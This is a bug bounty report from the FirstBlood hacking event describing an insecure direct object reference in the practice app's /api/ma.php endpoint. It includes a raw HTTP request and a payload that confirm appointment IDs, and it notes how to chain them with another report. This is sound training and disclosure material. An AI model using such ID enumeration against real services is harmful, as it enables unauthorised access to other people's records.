FirstBlood-#129 — IDOR 2 on ma.php - confirms numerical id for bug chain to report 127 without the need for drpanel
This issue was discovered on FirstBlood v1
On 2021-05-10, jpdev Level 3 reported:
Summary
Using the aptid paramater found on manageappointment.php, you can use this in place of the id parameter this will ONLY confirm that the numerical id is valid and returns a success message. It does not cancel the appointment. If you do not have access to the drpanel you can you use this bug in a bug chain to amend the messages on the appointment see report 127.
Example of its use in a chain:
Use the below to confirm the id is valid, with the id perform the attack referenced in report id = 127 https://www.bugbountyhunter.com/hackevents/report?id=127
Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10
act=cancel&aptid=56911904
P2 High
Endpoint: POST /api/ma.php
Parameter: aptid=
Payload: 56911904
FirstBlood ID: 6
Vulnerability Type: Insecure direct object reference
The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.